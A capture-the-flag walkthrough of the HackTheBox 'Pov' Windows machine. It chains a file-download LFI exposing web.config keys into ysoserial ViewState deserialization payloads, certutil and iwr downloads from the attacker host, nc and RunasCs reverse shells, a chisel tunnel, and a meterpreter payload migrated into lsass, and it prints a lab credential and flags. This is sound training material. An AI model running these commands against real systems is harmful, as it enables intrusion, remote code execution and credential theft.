HackTheBox | POV

In this walkthrough, I demonstrate how I obtained complete ownership of POV on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Medium Challenge
Owned Pov from Hack The Box!
I have just owned machine Pov from Hack The Box

Nmap Results

# Nmap 7.94SVN scan initiated Tue Jan 30 16:24:53 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.251
Nmap scan report for 10.10.11.251
Host is up (0.014s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: pov.htb
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   13.98 ms 10.10.14.1
2   14.12 ms 10.10.11.251

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 30 16:25:35 2024 -- 1 IP address (1 host up) scanned in 42.09 seconds





Service Enumeration

TCP/80

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: pov.htb

We can see that the default page on the target web server has a title of pov.htb. Let's add that to our /etc/hosts file.

echo '10.10.11.251        pov.htb' | sudo tee -a /etc/hosts

Gobuster Enumeration

Directories and Files

gobuster dir -u http://pov.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80.txt -t 100
/Index.html           (Status: 200) [Size: 12330]
/css                  (Status: 301) [Size: 142] [--> http://pov.htb/css/]
/img                  (Status: 301) [Size: 142] [--> http://pov.htb/img/]
/index.html           (Status: 200) [Size: 12330]
/js                   (Status: 301) [Size: 141] [--> http://pov.htb/js/]

Virtual Hosts

# --exclude-length 334 : silence HTTP 400
gobuster vhost -k --domain pov.htb --append-domain -u http://10.10.11.251 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]



dev.pov.htb

echo '10.10.11.251        dev.pov.htb' | sudo tee -a /etc/hosts

Add this hostname to our hosts file

On the contact.aspx page, there appears to be a form that makes a HTTP POST request to itself. Not sure if this is exploitable yet.

More Directory and File Enumeration

# Ignore 302,404 responses
gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-dev.txt -t 100 -b 302,404
/Contact.aspx         (Status: 200) [Size: 4691]
/Default.aspx         (Status: 200) [Size: 21371]
/assets               (Status: 301) [Size: 159] [--> http://dev.pov.htb/portfolio/assets/]
/contact.aspx         (Status: 200) [Size: 4691]
/default.aspx         (Status: 200) [Size: 21371]

If we try and navigate to http://dev.pov.htb/portfolio/assets, you can see that the web server redirects us to http://dev.pov.htb:8080.



Testing the Download Function

Clicking the Download CV button invokes a __doPostBack JavaScript event of download and uses the file name cv.pdf by default.

I got really lucky with my guess that the cv.pdf file is stored at the root of the directory.

💡
Effectively, the Download CV button is just pulling the cv.pdf file from this directory. Looking at my Burp request history, I notice there are other files we can test with in the /portfolio/ directory. It should be possible to download files by simply modifying the file= parameter in the POST request.

Let's see if we can download any of the above files from the server. The procedure will go like this:

  1. Turn on Burp intercept
  2. Click the Download CV button
  3. Change the cv.pdf filename to default.aspx
  4. Check and see if we got the page source code
Intercept on
Before
After (changed to default.aspx)
Click 'Forward'
Looking good! Click the 'Keep' button!
We have downloaded the server-side source code!



Additional Download Tests

This is the last request for the file download I just sent in Burp. Right-click the request and choose Send to Repeater.

Original request loaded into 'Repeater'

In the source code we downloaded above, we noted that the CodeFile=index.aspx.cs attribute where the default.aspx page runs its server-side code. Let's take a look at that file. In repeater, change &file=default.aspx to &file=index.aspx.cs and click Run.

Nice! We are able to read the C# code that will run server side when we load the page initially or interact with the Download even listener. There appears to be a bit of user input sanitization in the file= parameter as well, which wasn't a problem for us, as we used backslashes.

Let's take a look at contact.aspx and do the same thing. Load the page source, then load the server-side source.

Excellent! We can see the server-side code that will run when we load the page or submit information in the contact form.

Absolute paths also worked flawlessly without needing to do any special tricks. &file=C:\Windows\System32\drivers\etc\hosts.

As well as relative file path, where I was able to find the config file for the dev.pov.htb host — &file=..\web.config.

I even found that I can capture sfitz NetNTLMv2 hash by using impacket-smbserver and specifying &file=\\kali_vpn_ip\share_name\file_name.

Unfortunately, it didn't crack with JTR

I also tried creating reverse .aspx and web.config shells but had no luck getting a reverse shell when specifying &file=\\10.10.14.15\evil\file_name, even with other TCP ports specified.



Exploit

VIEWSTATE Deserialization with Secrets

I prodded the file system as much as I could with the LFI vulnerability, but came to a dead end. As any good security researcher would do, I took the information I'd gathered until now and searched Google for potential exploits, such as:

  • Response.TransmitFile() exploitability
  • Response.AppendHeader() exploitability

However, it was this search that ultimately opened the door to code execution:

web.config aes machine key exploit - Google Search
Exploiting __VIEWSTATE knowing the secrets - HackTricks

The HackTricks page advises us to use the ysoserial.exe binary to generate a serialized VIEWSTATE command that will be de-serialized by the server. In this case, we know the encryption secrets, as we have access to the web.config file.

Releases · pwntester/ysoserial.net
Deserialization payload generator for a variety of .NET formatters - pwntester/ysoserial.net
💡
You can download the ysoserial tool to a Windows VM, your Windows host, or run it using Wine on Kali. I'm going to do it the Wine way, cause I like pain.



Installing Wine Dependencies

🛑
I urge you to consider taking a snapshot of your Kali instance at its current state before installing Wine. That way you can easily roll it back in case anything goes wrong with the install or you're unhappy with the performance.
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install -y wine wine32:i386 winetricks mono-complete

Installing Wine-Mono

First, check the installed version of wine by running wine --version. In the screenshot below, you'll see I have version 8.0.1.

Next, we should consult the wine-mono version table here:

Mono - WineHQ Wiki

I am not at version 8.9 but my version is greater than 7.20, therefore, we should install wine-mono version 7.4.0.

wget https://dl.winehq.org/wine/wine-mono/7.4.0/wine-mono-7.4.0-x86.msi
wine uninstaller
💡
If you get error wine: could not load kernel32.dll, status c0000135, just run rm -rf ~/.wine/. Then, re-run wine uninstaller.
Click 'Install'
Double-click the downloaded '.msi' file then click 'OK'



Install .NET Libraries

winetricks dotnet48
Proceed through the installation



Generating the Serialized Payload

wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip -O ysoserial.zip
unzip -d ysoserial ysoserial.zip
cd ysoserial/Release

We'll be referencing the example command here to generate the payload.

# LD_PRELOAD= : a runtime environment variable to silence some errors on my host
# 2>/dev/null : Because wine was creating some weird error output that interfered with the payload
# sed s/\n//g' : Join on line breaks, not sure if wine is creating them

LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "ping 10.10.14.15" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'



Weaponizing the Payload

Go into your proxy settings and set to Intercept is on.

Click the Download CV button.

Note the request is intercepted and held by Burp. Highlight the VIEWSTATE parameter all the way up until the first & (ampersand).

Overwrite the contents of the VIEWSTATE parameter with your payload generated. Recall that the command I used in the example is ping 10.10.14.15, so I'm going to attempt to have the target ping my Kali VPN IP.

Go back into Burp and press the Forward button.

Note that I used tcpdump to listen for ICMP traffic on my tun0 interface and you can see the incoming ICMP echo request packets from 10.10.11.251 (the target's IP address).



Getting a Reverse Shell

Transfer nc.exe to the Target

cp /usr/share/windows-resources/binaries/nc.exe .
sudo python3 -m http.server 80

Copy 'nc.exe' to the current directory and host it over HTTP

LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "certutil.exe -urlcache -split -f http://10.10.14.15/nc.exe C:\Windows\Temp\nc.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'

Generate the VIEWSTATE payload

You can see the target successfully pulled the file



Trigger a Reverse Shell

sudo rlwrap nc -lnvp 443

Start a listener on your chosen TCP port

LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "C:\Windows\Temp\nc.exe 10.10.14.15 443 -e powershell.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'

Generate the VIEWSTATE payload





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 POV
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA076
Original Install Date:     10/26/2023, 1:01:55 PM
System Boot Time:          2/2/2024, 6:46:50 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,296 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 4,029 MB
Virtual Memory: In Use:    770 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.251
                                 [02]: fe80::4666:410:2b2c:7069
                                 [03]: dead:beef::4d88:e9c:6f0c:4b61
                                 [04]: dead:beef::a9
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.    

Current User

USER INFORMATION
----------------

User Name SID                                          
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                           Attributes                                        
====================================== ================ ============================================================= ==================================================
Everyone                               Well-known group S-1-1-0                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                     Well-known group S-1-5-3                                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                      Alias            S-1-5-32-568                                                  Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                       Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\dev                        Well-known group S-1-5-82-781516728-2844361489-696272565-2378874797-2530480757 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                                                                     


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled    



Users and Groups

Local Users

User accounts for \\POV

-------------------------------------------------------------------------------
Administrator            alaading                 DefaultAccount           
Guest                    sfitz                    WDAGUtilityAccount       
The command completed successfully.    

Local Groups

*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::a9
   IPv6 Address. . . . . . . . . . . : dead:beef::4d88:e9c:6f0c:4b61
   Link-local IPv6 Address . . . . . : fe80::4666:410:2b2c:7069%4
   IPv4 Address. . . . . . . . . . . : 10.10.11.251
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:89e0%4
                                       10.10.10.2    

Open Ports

localaddress localport
------------ ---------
::               49668
::               49667
::               49666
::               49665
::               49664
::               47001
::                5985
::                 445
::                 135
::                  80
0.0.0.0          49668
0.0.0.0          49667
0.0.0.0          49666
0.0.0.0          49665
0.0.0.0          49664
10.10.11.251       139
0.0.0.0            135    



Interesting Files

C:\Users\sfitz\Documents\connection.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
    </Props>
  </Obj>
</Objs>





Privilege Escalation

Lateral to Alaading

In the post-exploit enumeration section, we came across the C:\Users\sfitz\Documents\connection.xml file, which when inspected is a PowerShell PSCredential object stored in clixml format.

I'm already running a PowerShell reverse shell, so I should be able to import the credential object and reveal the plaintext password with ease.

$cred = Import-Clixml C:\Users\sfitz\Documents\connection.xml
$cred.GetNetworkCredential().Username
$cred.GetNetworkCredential().Password
alaading : f8gQ8fynP44ek1m3

You may also have noticed in the post-exploit enumeration that tcp/5985 is open in the listening ports. It is definitely behind Windows firewall, as it wasn't exposed in our initial nmap scan. We can use chisel to forward this port.

wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz -O chisel.exe.gz
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
gunzip chisel.exe.gz
gunzip chisel.gz
chmod u+x chisel
sudo python3 -m http.server 80

Download the binaries and host over HTTP

cd C:\Windows\Temp
iwr http://10.10.14.15/chisel.exe -o chisel.exe

Download to the target

sudo ./chisel server --port 8081 --reverse &

Start chisel in server mode on Kali

$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.10.14.15:8081','R:5985:127.0.0.1:5985') }
Start-Job -ScriptBlock $scriptBlock

Start chisel in client mode as a background job on the target

evil-winrm -i 127.0.0.1 -u 'alaading' -p 'f8gQ8fynP44ek1m3'

Connect to the target through the chisel tunnel

💡
Now that we've established our shell as alaading, we repeat the post-exploit enumeration process.



Alternative Lateral to Alaading

Release RunasCs version 1.5 · antonioCoco/RunasCs
Added Added flag --remote-impersonation that will spawn the new process with the main thread impersonating the requested user logon. This can facilitate some IL escape scenarios, e.g. elevation fr…
Spawn Processes as Oth... | 0xBEN | Notes
RunasCs.exe Project GitHub https://github.com/antonioCoco/RunasCs/releases Example Usage Spawn P…
  1. Transfer RunasCs.exe to the target
  2. Start a TCP listener
  3. Run the command to connect to the TCP listener with alaading credentials
sudo rlwrap nc -lvnp 443

Start the listener

.\RunasCs.exe 'alaading' 'f8gQ8fynP44ek1m3' 'powershell.exe' -r 10.10.14.15:443

Spawn the process and redirect to the listener



Escalate to Administrator

ℹ️
I gave it my best effort to use the SeDebugPrivilege given to this user account to achieve NT AUTHORITY/SYSTEM or Administrator without meterpreter. I was able to dump lsass using procdump, but the Administrator didn't have a cached session. Other techniques were also fruitless.

Metasploit

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f exe -o sh.exe

Create the meterpreter payload

sudo msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

Start MSF and use and configure the exploit handler

sudo python3 -m http.server 80

Server the meterpreter payload over HTTP

iwr http://10.10.14.15/sh.exe -o sh.exe
.\sh.exe

Download and run the file

meterpreter > migrate -N lsass.exe
Running as SYSTEM!



Flags

User

6554d872ca302f4e5c7c31ac06f8f638    

Root

8f5b63e0cff832f141a776127bb09758    
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.